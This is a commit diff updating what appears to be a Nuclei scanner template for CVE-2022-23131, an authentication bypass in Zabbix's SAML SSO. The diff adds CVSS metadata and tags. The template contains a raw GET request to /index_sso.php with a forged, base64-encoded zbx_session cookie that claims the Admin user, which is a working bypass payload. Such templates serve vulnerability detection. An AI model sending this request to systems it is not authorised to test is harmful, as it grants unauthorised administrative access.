Update CVE-2022-23131.yaml
parent
56713b8175
commit
23ea9fc5e1
|
@ -1,25 +1,25 @@
|
|||
id: CVE-2022-23131
|
||||
|
||||
info:
|
||||
name: Zabbix Saml Bypass
|
||||
name: Zabbix - SAML SSO Authentication Bypass
|
||||
author: For3stCo1d
|
||||
severity: high
|
||||
description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
|
||||
reference:
|
||||
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
|
||||
- https://github.com/Mr-xn/cve-2022-23131
|
||||
tags: cve,cve2022,zabbix
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-23131
|
||||
tags: cve,cve2022,zabbix,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /index_sso.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
|
||||
- |
|
||||
GET /index_sso.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
|
||||
|
||||
|
||||
matchers-condition: and
|
||||
|
|
Loading…
Reference in New Issue